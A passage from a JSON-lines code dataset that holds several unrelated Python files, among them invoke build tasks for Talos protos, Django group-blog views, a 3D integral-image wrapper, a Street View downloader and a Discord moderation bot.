(x**t - 1)%n == 0:\n added = False\n for o in orders:\n if t == o.order:\n o.elements.append(x)\n added = True\n break\n if added:\n break\n o = Order(t, x)\n orders.append(o)\n break\n t=t+1\n\nprint(\"Orders in form of order: element1, element2, ...\")\nfor o in orders:\n o.output()\n cg.computes_with_generator(o.elements[0], o.order, n)\n print('')","repo_name":"aaanoifjia/zawu","sub_path":"math/cyclic-group/group_of_units_modulo_n.py","file_name":"group_of_units_modulo_n.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9611554209","text":"\nn=int(input())\ns=input()\nans=s.count(\"E\")\nif s[0]==\"E\": ans-=1\nchk=ans\nfor a,i in enumerate(s[1:]):\n if i==\"E\": chk-=1\n if s[a]==\"W\": chk+=1\n ans=min(ans,chk)\nprint(ans)\n\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b076_100/b098/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31142747206","text":"from invoke import task\nimport fsspec\nfrom pathlib import Path\nimport re\nimport tomlkit\n\n\n@task\ndef download_protos(c, username=None, token=None):\n c.run(\"rm -rf protos\")\n print(f\"Downloading proto files for Talos API {c['api_version']} to ./protos\")\n source_repo = fsspec.filesystem(\n \"github\",\n org=\"siderolabs\",\n repo=\"talos\",\n sha=c[\"api_version\"],\n username=username,\n token=token,\n )\n destination = Path(\"./protos\")\n destination.mkdir(exist_ok=True)\n source_repo.get(source_repo.ls(\"api/\"), destination.as_posix(), 
recursive=True)\n source_repo.get(\"LICENSE\", (destination / \"LICENSE\").as_posix())\n\n\n@task\ndef patch_pyproject_toml(c):\n api_version = c[\"api_version\"]\n print(f\"Patching pyproject.toml with API version tag {api_version}\")\n with open(\"pyproject.toml\", \"r\") as file:\n config = tomlkit.load(file)\n\n config[\"project\"][\"name\"] = f\"talos-linux-api-{api_version}\"\n config[\"project\"][\"description\"] = re.sub(\n \"\\(.*\\)\", f\"({api_version})\", config[\"project\"][\"description\"]\n )\n\n with open(\"pyproject.toml\", \"w\") as file:\n tomlkit.dump(config, file)\n\n\n@task\ndef clean(c):\n c.run(\"rm -rf src\")\n\n\n@task(clean)\ndef compile(c):\n module_name = c[\"api_version\"].replace(\".\", \"_\")\n out_dir = Path(\"src/talos_linux_api\") / module_name\n print(f\"Compiling to {out_dir}\")\n out_dir.mkdir(exist_ok=True, parents=True)\n c.run(\n \"protoc \"\n f\"--python_betterproto_out={out_dir.as_posix()} \"\n \"-I protos \"\n \"-I protos/vendor \"\n '$(find protos -name \"*.proto\" -and -not -path \"*vendor*\")'\n )\n\n\n@task(compile, patch_pyproject_toml)\ndef build(c):\n c.run(\"pytest\")\n","repo_name":"stereobutter/talos-linux-api","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"21400140354","text":"from multiprocessing import context\nimport pstats\nfrom tokenize import group\nfrom turtle import title\nfrom django.shortcuts import render,redirect\nfrom .models import *\nfrom .forms import *\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom .tokens import account_activation_token\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMessage\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.template.defaultfilters import slugify\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\n\ndef register(request):\n if request.method== 'POST':\n fullname= request.POST.get('name')\n username= request.POST.get('username')\n email= request.POST.get('email')\n password= request.POST.get('password')\n if User.objects.filter(email=email):\n return render(request, 'signup.html')\n user_obj= User(username=username, email=email, first_name= fullname) \n user_obj.set_password(password)\n user_obj.save()\n user = authenticate(username=username, password=password)\n login(request, user)\n \n return redirect('list')\t\n return render(request, 'home.html')\n\n@login_required(login_url=\"\")\ndef create_group(request):\n if request.method== 'POST':\n title = request.POST.get('title')\n slug = title.replace(\" \",\"-\")\n description= request.POST.get('description')\n group_obj= Group.objects.create(author=request.user,slug=slug, title= title , description= description)\n group_obj.save()\n return redirect('list')\t\n return render(request, 'home.html')\n\n\ndef loginUser(request):\n if request.user.is_authenticated:\n return redirect('list')\n if request.method == 'POST':\n username = request.POST['username']\n password = 
request.POST['password']\n user = User.objects.filter(username=username).first() # avoids DoesNotExist when the username is unknown\n if user:\n username = user.username\n user = authenticate(request, username=username, password=password) # check password\n\n if user is not None:\n login(request, user)\n return redirect('list')\t\n \n return render(request,'home.html',)\n\ndef logoutUser(request):\n logout(request)\n return redirect('/')\n\n@login_required(login_url=\"\")\ndef create_post(request):\n if request.method== 'POST':\n post_text= request.POST.get('post_text')\n slug= request.POST.get('slug')\n group_obj = Group.objects.get(slug=slug)\n title = request.POST.get('title')\n post_obj= Post.objects.create(group = group_obj, post_by=request.user, title=title, post_text= post_text )\n post_obj.save()\n\n return redirect(reverse('detail', args = [slug]))\n return render(request,'home.html')\n\n@login_required(login_url=\"\")\ndef create_comment(request):\n \n if request.method== 'POST':\n\n id = request.POST.get('id')\n post_obj = Post.objects.get(id=id)\n description= request.POST.get('comment')\n comment_obj= PostComment.objects.create(name = request.user, description= description, post = post_obj)\n comment_obj.save()\n\n return redirect(reverse('post',args=[id]))\n return render(request,'home.html')\n\n@login_required(login_url=\"\")\ndef create_reply(request):\n \n if request.method== 'POST':\n comment_id= request.POST.get('id')\n description= request.POST.get('comment')\n post_id = request.POST.get('post_id')\n \n comment_obj = PostComment.objects.get(id=comment_id)\n comment_obj= CommentReply.objects.create(name = request.user, description= description, comment = comment_obj )\n comment_obj.save()\n\n return redirect(reverse('post', args = [post_id]))\n return render(request,'home.html')\n\n@login_required(login_url=\"\")\ndef join_group(request,id):\n \n Group_obj = Group.objects.get(slug=id)\n GroupJoined_obj = GroupJoined.objects.create(joined_group=Group_obj, joined_by=request.user)\n GroupJoined_obj.save()\n\n return redirect(reverse('detail', args = [id]))\n\ndef GroupList(request):\n groups = Group.objects.all()\n resent_groups = Group.objects.all()[:4]\n count = groups.count()\n\n paginator = Paginator(groups ,10) # Shows only 10 records per page\n\n page = request.GET.get('page')\n try:\n group = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n group = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 
7777), deliver last page of results.\n group = paginator.page(paginator.num_pages)\n \n for i in (group):\n i.description=i.description[:500]\n context = {\n 'groups':groups,\n 'group':group,\n 'count':count,\n 'resent_groups':resent_groups\n }\n return render(request,'grouplist.html',context)\n\n\ndef GroupDetail(request,slug):\n resent_groups = Group.objects.all()[:4]\n group = Group.objects.get(slug=slug)\n posts= Post.objects.filter(group=group)\n temp = False\n\n for g in GroupJoined.objects.filter(joined_group=group):\n if g.joined_by == request.user:\n temp = True\n context = {\n 'group':group,\n 'posts':posts,\n 'is_member':temp,\n 'resent_groups':resent_groups\n }\n return render(request,'groupdetail.html',context)\n\n@login_required(login_url=\"\")\ndef GroupMembers(request, slug):\n group = Group.objects.get(slug=slug)\n resent_groups = Group.objects.all()[:4]\n members = GroupJoined.objects.filter(joined_group=group)\n context = {\n 'group':group,\n 'members':members,\n 'resent_groups':resent_groups\n }\n return render(request,'groupmembers.html',context)\n\ndef ViewPost(request,id):\n post_obj = Post.objects.get(id=id)\n post_comment = PostComment.objects.filter(post=post_obj)\n\n resent_groups = Group.objects.all()[:4]\n\n context = {\n 'post':post_obj,\n 'comments':post_comment,\n 'resent_groups':resent_groups\n }\n return render(request,'post.html',context)\n\n@login_required(login_url=\"\")\ndef view_profile(request,id):\n user_obj = User.objects.get(id=id)\n\n resent_groups = Group.objects.all()[:4]\n context = {\n 'user_obj':user_obj,\n 'resent_groups':resent_groups\n }\n return render(request, 'profile.html',context)\n\n@login_required(login_url=\"\")\ndef user_post(request,id):\n user_obj = User.objects.get(id=id)\n posts = Post.objects.filter(post_by=user_obj)\n resent_groups = Group.objects.all()[:4]\n\n context = {\n 'user_obj':user_obj,\n 'posts':posts,\n 'resent_groups':resent_groups\n }\n return render(request, 'user_post.html',context)\n\ndef home(request):\n resent_groups = Group.objects.all()[:4]\n context = {\n 'resent_groups':resent_groups\n }\n return render(request,'home.html',context)","repo_name":"TayyabImran009/group-blogs","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16118085854","text":"\"\"\" This module provides an interface to calculate values inside a box given\n a set of coordinates and an image \"\"\"\nimport os\nimport ctypes as ct\nimport numpy as np\n\n\nclass IntegralImage(object):\n \"\"\"Class to handle cumulative summed table along with 3D integral image\"\"\"\n\n def __init__(self, img):\n # initialize with the 3d integral image\n self._integral_image = self._integral_image_3d(img)\n\n # keep map sizes\n self._x_size = self._integral_image.shape[0]\n self._y_size = self._integral_image.shape[1]\n self._z_size = self._integral_image.shape[2]\n\n # set ctype function handler\n current_file_dir = os.path.dirname(__file__)\n self._lib = ct.cdll.LoadLibrary(current_file_dir +\n '/lib/libintegral_images_3d.so')\n\n def _integral_image_3d(self, img):\n \"\"\"Calculates a 3D integral image from an input image.\n\n :param img : W x H x L array\n Integral image of size W x H x L\n\n :return rt_image : IntegralImage object\n Object containing integral image and its parameters.\n Returns empty list on failure.\n \"\"\"\n # Check if points are 3D otherwise early exit\n if img.ndim != 3:\n raise 
ValueError('Not a 3D image for integral image: input dim {}'\n .format(img.ndim))\n\n integral_image = np.cumsum(np.cumsum(np.cumsum(img, 0), 1), 2)\n # pad integral image with 0s on one side of each dimension\n # so that when accessing coordinate n-1, we get a valid value of 0\n integral_image = np.pad(integral_image, ((1, 0), (1, 0), (1, 0)),\n 'constant', constant_values=0)\n\n # Convert to fortran style array for ctype function call for query\n integral_image = np.asfortranarray(integral_image, dtype=np.float32)\n\n return integral_image\n\n def query(self, cuboids):\n \"\"\"Input is an array of 3D cuboids 6 coordinates. Each column\n represents a cuboid in the format [x1, y1, z1, x2, y2, z2].T. Thus,\n the dimensions should be 6 x N. The 2 sets of 3D coordinates represent\n the 2 corners of the bounding box. The first set of coordinates is the\n point closest to the origin of the image. The second set of coordinates\n is the point farthest from the origin. img is the integral image array.\n\n :param cuboids : 6 x N ndarray\n Contains the (x1, y1, z1) and (x2, y2, z2) coordinates\n of the box to query.\n\n :return param : N x 1 ndarray\n List consists of values contained inside box specified by\n coordinates from cuboids. Empty on failure.\n \"\"\"\n cuboids = np.asarray(cuboids)\n\n # check size\n if cuboids.shape[0] != 6:\n raise ValueError(\n 'Incorrect number of dimensions for query: input dim {}'.format(cuboids.shape[0]))\n\n if cuboids.shape[1] < 1:\n raise ValueError(\n 'The dimension N must be at least 1: input dim {}'.format(cuboids.shape[1]))\n\n if cuboids.dtype != np.uint32:\n raise TypeError('Cuboids must be type of np.uint32')\n\n # Convert given array to a fortran contiguous array with dtype uint32\n # Add 1 for first 3 rows to account for zero-padding in first coordinate\n cuboids[:3, :] += 1\n\n cuboids = np.asfortranarray(cuboids)\n\n # Clip all the maximum coordinates to the voxelgrid size\n # Note: The integral image gets zero padded.\n max_extents = np.array(\n [self._x_size, self._y_size, self._z_size,\n self._x_size, self._y_size, self._z_size]) - 1\n\n cuboids = np.minimum(cuboids, max_extents.reshape(6, -1)) \\\n .astype(np.uint32)\n\n int_img_fnc = self._lib.integralImage3D\n int_img_fnc.restype = None\n int_img_fnc.argtypes = [\n # list that stores outputs\n np.ctypeslib.ndpointer(dtype=np.float32,\n flags='C_CONTIGUOUS'),\n # list of box coordinates\n np.ctypeslib.ndpointer(dtype=np.uint32,\n flags='F_CONTIGUOUS'),\n ct.c_uint, # number of boxes\n # integral image\n np.ctypeslib.ndpointer(dtype=np.float32,\n flags='F_CONTIGUOUS'),\n ct.c_uint, # width of integral image\n ct.c_uint, # height of integral image\n ct.c_uint, # length of integral image\n ]\n\n num_of_cuboids = cuboids.shape[1]\n\n # initialize output array\n output = np.empty((num_of_cuboids, 1), dtype=np.float32, order='C')\n\n int_img_fnc(output, cuboids, ct.c_uint(num_of_cuboids), self._integral_image,\n ct.c_uint(self._x_size), ct.c_uint(self._y_size), ct.c_uint(self._z_size))\n\n return output\n","repo_name":"ZiningWang/Sparse_Pooling","sub_path":"avod/wavedata/wavedata/tools/core/integral_image.py","file_name":"integral_image.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"52"} +{"seq_id":"27830087706","text":"#import logging as log\n#log.basicConfig( level=log.DEBUG, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%I:%M:%S' )\n#log.basicConfig( level=config.debug_level, 
format='%(asctime)s %(levelname)s: %(message)s', datefmt='%I:%M:%S' )\n\nimport time\n\ntime_begin = time.time()\n\n#if __name__ == '__main__':\n# log.debug('Hello from (%s)', __file__)\n\n\n#def create_table(cur, tab_name):\n# log.debug('Create table [%s]', tab_name)\n# cur.execute('CREATE TABLE ' + tab_name + '(Id INTEGER PRIMARY KEY, Time TEXT)')\n\n#def add_column(cur, tab_name, col_name, col_type):\n# log.debug('Add column [%s] to table [%s]', col_name, tab_name)\n# cur.execute('ALTER TABLE ' + tab_name + ' ADD COLUMN ' + col_name + ' ' + col_type)\n\n#def insert_into(cur, tab_name, col_name, data):\n# log.debug('Insert into table [%s], column [%s] - (%s)', tab_name, col_name, data)\n# cur.execute('INSERT INTO ' + tab_name + '(Time,' + col_name + ') ' + 'VALUES(datetime(\"now\", \"localtime\"), ' + data + ')')\n\n#def select_data(cur, tab_name, cols, rows_limit):\n# log.debug('Select %s from %s with limit: %d', cols, tab_name, rows_limit)\n# last_col = cols.split(',')[-1]\n# cur.execute('SELECT ' + cols + ' FROM ' + tab_name + ' WHERE ' + last_col + ' IS NOT Null' + ' ORDER BY ' + 'Id ' + 'DESC LIMIT ' + unicode(rows_limit))\n\n\n#log.info('(%s) execution time: [%s]\\n', __file__, time.time() - time_begin)\n\n\n\n\n\n\nif __name__ == u'__main__':\n log_tool = Log_tool(10)\n\n log_tool.info(['(%s) execution time: [%s]\\n', __file__, time.time() - time_begin])\n log_tool.debug(['Select %s from %s with limit: %s', u'cols', u'tab_name', u'rows_limit'])\n","repo_name":"kirimaks/data_plot","sub_path":"tools/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9329335636","text":"'''Get images from Google Street View'''\nfrom pathlib import Path\nimport shutil\n\nimport requests\n\n\nclass InvalidResponse(Exception):\n pass\n\n\nclass StreetView:\n ''' Get image from Google StreetView '''\n\n def __init__(self, api_key):\n self.api_key = api_key\n\n def save_image(\n self,\n image_path: Path,\n latitude: float,\n longitude: float,\n heading: int = 0,\n pitch: int = 0,\n fov: int = 120,\n width: int = 640,\n height: int = 640,\n ):\n # Construct api url\n image_size = f'{width}x{height}'\n url = f'https://maps.googleapis.com/maps/api/streetview?location={latitude},{longitude}&size={image_size}&heading={heading}&pitch={pitch}&fov={fov}&key={self.api_key}'\n\n # Get response and save\n resp = requests.get(url, stream=True)\n if resp.status_code == 200:\n with image_path.open('wb') as f:\n resp.raw.decode_content = True\n shutil.copyfileobj(resp.raw, f)\n print(f'Saved {str(image_path)}')\n else:\n raise InvalidResponse(f'{url}, statue_code: {resp.status_code}')\n","repo_name":"mknz/dsr-road-roughness-prediction","sub_path":"road_roughness_prediction/tools/google_street_view.py","file_name":"google_street_view.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"22614306830","text":"# https://leetcode.com/problems/find-smallest-letter-greater-than-target/\n\ndef next_greatest_letter(letters, target) -> str:\n for c in letters:\n if ord(c) > ord(target):\n return c\n return letters[0]\n\n\n# letters = ['a', 'b']\n# target = 'z'\n# # Output: a\n\n\n# letters = ['c', 'f', 'j']\n# target = 'a'\n# # Output: c\n\n# letters = ['c', 'f', 'j']\n# target = 'c'\n# # Output: f\n\nletters = ['c', 'f', 'j']\ntarget = 'j'\n# Output: c\n\n# letters = ['c', 'f', 'j']\n# target = 
'd'\n# # Output: f\n\n\nprint(next_greatest_letter(letters, target))\n","repo_name":"abdifatahmohamad/Coding-Interview-Solutions","sub_path":"string_solutions/easy/next_greatest_target.py","file_name":"next_greatest_target.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25545379068","text":"# bot.py\nimport os, discord, asyncio, discord.utils, calendar, re, requests, datetime\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\nbot = commands.Bot(command_prefix='a!')\nbot.remove_command('help')\n\n@bot.event\nasync def on_ready():\n\tglobal illusoria\n\tillusoria = bot.guilds[0]\n\tprint(f\"Aimil was properly initalized at {str(datetime.datetime.now())}\")\n\n@bot.command(name='help')\nasync def help(ctx, command=''):\n print(f\"help command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n header = '''\nAll commands for Aimil begin with the prefix 'a!'. Most commands are also formatted into user-friendly strings, instead of returning primital values.\nIn the usage statements, parameters specified with {curly braces} required, while (parenthesis) are optional.\nFor any issues, please contact @Citrisfur#0404, or nathanscoy@gmail.com.\n'''\n commandList = {\n \"help\": '''\nhelp // Displays a list of commands that Aimil can recognize.\n Usage: a!help (command)\n [string] command - specifies a command to display additional information about.''',\n \"ping\": '''\nping // Returns the bot's latency in seconds.\n Usage: a!ping''',\n }\n\n if command != '':\n if command.lower() in commandList:\n await ctx.send(header + commandList[command.lower()])\n else:\n await ctx.send(\"The specified command doesn't exist. 
Recheck the typing, or try the command list with a!help.\")\n else:\n await ctx.send(header + '''\n=== Command List ===\n\nhelp\nping\ntech\njoined\necho\n\n== Moderator ==\n\ngiverole\nremoverole\nremoveintro\n\n= Debugging =\n\nwikitest\nlistemoji\nmodcheck\n''')\n\n@bot.command(name='ping')\nasync def ping(ctx):\n print(f\"ping command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n await ctx.send(f\"Aimil is latent by {str(bot.latency)} seconds.\")\n\n@bot.command(name=\"wikitest\", help=\"a way to test the wiki's status\")\nasync def wikitest(ctx):\n\tprint(f\"wikitest command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tpage = requests.get(\"http://ichno.org/illusoria/doku.php?id=players:citrisfur\")\n\tpageText = page.text\n\toutput = \"Testing on Citrisfur's wiki page:\\nInformation as it appears on the wiki:\\n\"\n\n\tresult = re.search(\"Join date:.+>(.+)<\", pageText)\n\toutput += \"Citrisfur's join date: \" + result.group(1) + '\\n'\n\n\tresult = re.search(\"DoB:.+>(.+)<\", pageText)\n\toutput += \"Citrisfur's DoB: \" + result.group(1) + '\\n'\n\n\tresult = re.search(\"Timezone:.+>(.+)<\", pageText)\n\toutput += \"Citrisfur's time zone: \" + result.group(1) + '\\n'\n\tawait ctx.send(output)\n\n@bot.command(name=\"tech\", help=\"retrieves a tech from the wiki\")\nasync def tech(ctx, techName):\n\tprint(f\"tech command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait ctx.trigger_typing()\n\tpageNum = 1\n\tpages = {\n\t\t1: \"dark\",\n\t\t2: \"earth\",\n\t\t3: \"fire\",\n\t\t4: \"light\",\n\t\t5: \"oz\",\n\t\t6: \"water\",\n\t\t7: \"wind\",\n\t\t8: \"no_element\"\n\t}\n\n\tresult = None\n\twhile result == None:\n\t\tpage = requests.get(\"http://ichno.org/illusoria/doku.php?id=lore:techniques:\" + pages[pageNum] + \"&do=edit\")\n\t\tpageText = page.text\n\t\tresult = re.search(\"^.+\" + techName + \".+\\|\", pageText, flags=re.M+re.I)\n\t\tpageNum += 1\n\t\tif pageNum == 9:\n\t\t\tbreak\n\n\tif result != None:\n\t\tawait ctx.send(\"**Tech:** \" + techName.capitalize() + ' ' + ctx.author.mention + \"\\n```fix\\n^ Stage ^ Technique ^ Range/Targets ^ Style ^ Element ^ Power ^ Other Information ^ Description ^ Evo. 
From ^```\\n```\" + result.group(0).replace(\""\", \"\\\"\") + \"```\")\n\telse:\n\t\tawait ctx.send(ctx.author.mention + \" Tech \" + techName + \" not found in the wiki.\")\n\n@bot.command(name=\"listemoji\", help=\"lists all server emojis\")\nasync def listemoji(ctx):\n\tprint(f\"listemoji command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\temojiList = ''\n\ti = 0\n\tfor emoji in illusoria.emojis:\n\t\temojiList += emoji.name + \": \" + str(emoji) + \", \"\n\t\ti += 1\n\t\tif i == 20:\n\t\t\tawait ctx.send(emojiList[:-2])\n\t\t\temojiList = ''\n\t\t\ti = 0\n\n\tawait ctx.send(emojiList[:-2])\n\n@bot.command(name=\"joined\")\nasync def joined(ctx, name=''):\n\tprint(f\"joined command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tif name == '':\n\t\tname = ctx.author.name\n\tmember = await illusoria.query_members(query=name, limit=1, user_ids=None, cache=True)\n\tif member != []:\n\t\tjoinTime = str(member[0].joined_at)\n\t\tawait ctx.send(member[0].name + \" joined Illusoria on \" + calendar.month_name[int(joinTime[6:7])] + \" \" + joinTime[9:10] + \", \" + joinTime[0:4] + \" at \" + joinTime[12:] + \" UTC.\")\n\telse:\n\t\tawait ctx.send(\"Member not found.\")\n\n@bot.command(name='echo')\nasync def echo(ctx, msg):\n\tprint(f\"echo command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait ctx.send(msg)\n\n@bot.command(name='createrole')\n@commands.has_role(\"Mod Gestapo\")\nasync def createrole(ctx, roleName, r, g, b):\n\tprint(f\"createrole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tnewRoleID = 0\n\thighestPosition = 0\n\tawait illusoria.create_role(name=roleName, color=discord.Color.from_rgb(int(r), int(g), int(b)))\n\n\tfor role in illusoria.roles:\n\t\tif role.name == roleName:\n\t\t\tnewRoleID = role.id\n\n\tfor role in ctx.author.roles:\n\t\tif role.position > highestPosition:\n\t\t\thighestPosition = role.position\n\n\tawait illusoria.get_role(newRoleID).edit(position=highestPosition+1, reason=\"putting the role at high priority for username color change\")\n\tawait ctx.author.add_roles(illusoria.get_role(newRoleID))\n\tawait ctx.send(f\"you should now have the new role \\\"{roleName}\\\".\")\n\n@bot.command(name='kick')\nasync def kick(ctx):\n\tprint(f\"kick command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait illusoria.kick(ctx.author)\n\tawait ctx.send(f\"user {ctx.author} kicked.\")\n\n@bot.command(name='deleterole')\n@commands.has_role(\"Mod Gestapo\")\nasync def createrole(ctx, roleName):\n\tprint(f\"deleterole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tconfirmCheck = True\n\n\tfor role in illusoria.roles:\n\t\tif roleName.lower() in role.name.lower():\n\t\t\tawait ctx.send(f\"role \\\"{role.name}\\\" found. delete this role? 
y/n\")\n\t\t\twhile confirmCheck:\n\t\t\t\tconfirm = await bot.wait_for('message')\n\t\t\t\tif confirm.author == ctx.author:\n\t\t\t\t\tconfirmCheck = False\n\n\t\t\tif confirm.content == 'y':\n\t\t\t\tawait role.delete()\n\t\t\t\tawait ctx.send(f\"role \\\"{role.name}\\\" was deleted.\")\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tawait ctx.send(\"role was not deleted.\")\n\t\t\t\tconfirmCheck = True\n\n@bot.command(name=\"giverole\")\n@commands.has_role(\"Mod Gestapo\")\nasync def giverole(ctx, addingRole, person):\n\tprint(f\"giverole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tfor role in illusoria.roles:\n\t\tif str(addingRole) in role.name:\n\t\t\taddingRole = role\n\t\t\tbreak\n\n\tmember = await illusoria.query_members(query=person, limit=1, user_ids=None, cache=True)\n\tif member == []:\n\t\tawait ctx.send(f\"Member {person} not found.\")\n\telse:\n\t\tawait member[0].add_roles(illusoria.get_role(addingRole.id))\n\t\tawait ctx.send(f\"{member[0].name} now has the {illusoria.get_role(addingRole.id).name} role.\")\n\n@bot.command(name=\"removerole\")\n@commands.has_role(\"Mod Gestapo\")\nasync def removerole(ctx, removingRole, person):\n\tprint(f\"removerole command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tremoveRole = removingRole\n\tmember = await illusoria.query_members(query=person, limit=1, user_ids=None, cache=True)\n\tfor role in member[0].roles:\n\t\tif str(removingRole) in role.name:\n\t\t\tremoveRole = role\n\t\t\tbreak\n\n\tif removeRole == removingRole:\n\t\tawait ctx.send(member[0].name + \" does not have the role.\")\n\t\treturn\n\n\tawait member[0].remove_roles(illusoria.get_role(removeRole.id))\n\tawait ctx.send(member[0].name + \" no longer has the role \" + illusoria.get_role(removeRole.id).name + \".\")\n\n@bot.command(name=\"removeintro\")\nasync def removeintro(ctx, person):\n\tprint(f\"removeintro command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tconfirmCheck = True\n\tconfirm = ''\n\n\tasync for intro in bot.get_channel(737087582764269635).history():\n\t\tif person in intro.author.name.lower():\n\t\t\tawait ctx.send(f\"intro by {intro.author.name} found. delete this intro? 
y/n\")\n\t\t\twhile confirmCheck:\n\t\t\t\tconfirm = await bot.wait_for('message')\n\t\t\t\tif confirm.author == ctx.author:\n\t\t\t\t\tconfirmCheck = False\n\n\t\t\tif confirm.content == 'y':\n\t\t\t\tawait intro.delete()\n\t\t\t\tawait ctx.send(f\"intro by {intro.author.name} was deleted.\")\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tawait ctx.send(\"intro was not deleted.\")\n\t\t\t\tconfirmCheck = True\n\n\tif confirm == '':\n\t\tawait ctx.send(f\"no intros by user {person} were found.\")\n\n@bot.command(name='lastmessage')\nasync def lastmessage(ctx, name):\n\tprint(f\"removeintro command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tmember = await illusoria.query_members(query=name, limit=1, user_ids=None, cache=True)\n\tif member != []:\n\t\tfor channel in illusoria.channels:\n\t\t\ttry:\n\t\t\t\tasync for message in channel.history():\n\t\t\t\t\tawait ctx.send(f\"Message by {member.name} found\")\n\t\t\t\t\tprint(message.content)\n\t\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\telse:\n\t\tawait ctx.send(\"Member not found.\")\n\n@bot.command(name=\"modcheck\")\n@commands.has_role(\"Mod Gestapo\")\nasync def modcheck(ctx):\n\tprint(f\"modcheck command was run by {str(ctx.author)} at {str(datetime.datetime.now())}\")\n\tawait ctx.send(\"pass\")\n\n@bot.event\nasync def on_command_error(ctx, error):\n\tusages = {\n\t\t\"joined\": \"Usage: a!joined {user-name}\",\n\t\t\"giverole\": \"Usage: a!giverole {role-name} {user-name}\",\n\t\t\"removerole\": \"Usage: a!removerole {role-name} {user-name}\",\n\t\t\"removeintro\": \"Usage: a!removeintro {user-name}\",\n\t}\n\n\tif isinstance(error, commands.errors.MissingRequiredArgument):\n\t\tawait ctx.send(usages.get(ctx.invoked_with))\n\telif isinstance(error, commands.errors.CheckFailure):\n\t\tawait ctx.send(\"You do not have the mod role.\")\n\telse:\n\t\tawait ctx.send(str(error))\n\nbot.run(TOKEN)\n","repo_name":"Citrisfur/discord-aimil","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":9961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40143317918","text":"import json\nfrom PIL import Image, ImageDraw, ImageFont\nimport os\nfrom image_utils import ImageText\n\n\nclass Card:\n def __init__(self, name, data):\n self.data = data\n\n self.file_name = f\"../cards/{name}.png\"\n\n self.font_name = 'arial.ttf'\n self.font_main_name = 'arial.ttf'\n self.font_main = ImageFont.truetype(self.font_main_name, 12)\n self.font = ImageFont.truetype(self.font_name, 10)\n self.neutralColorA = (66, 66, 66)\n\n #########################\n\n def generate_buff(self):\n self.mode = \"buff\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n # image = self.draw_main_stats(image)\n\n image = self.add_image(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.draw_main_stats(image)\n\n image = self.add_special_info(image)\n\n #########################\n\n image.save(self.file_name)\n # os.system(self.file_name) # show file\n\n\n def generate_equipment_and_spells(self):\n self.mode = \"equipment_and_spell\"\n image = Image.open(r\"../../assets/c.jpg\")\n\n image = self.change_color(image)\n\n self.draw_lines(image)\n\n #image = self.draw_main_stats(image)\n\n image = self.add_image_cropped(image)\n\n text_layer = self.get_text_layer()\n image = Image.alpha_composite(image, text_layer)\n\n image = self.add_special_info(image)\n\n image = 
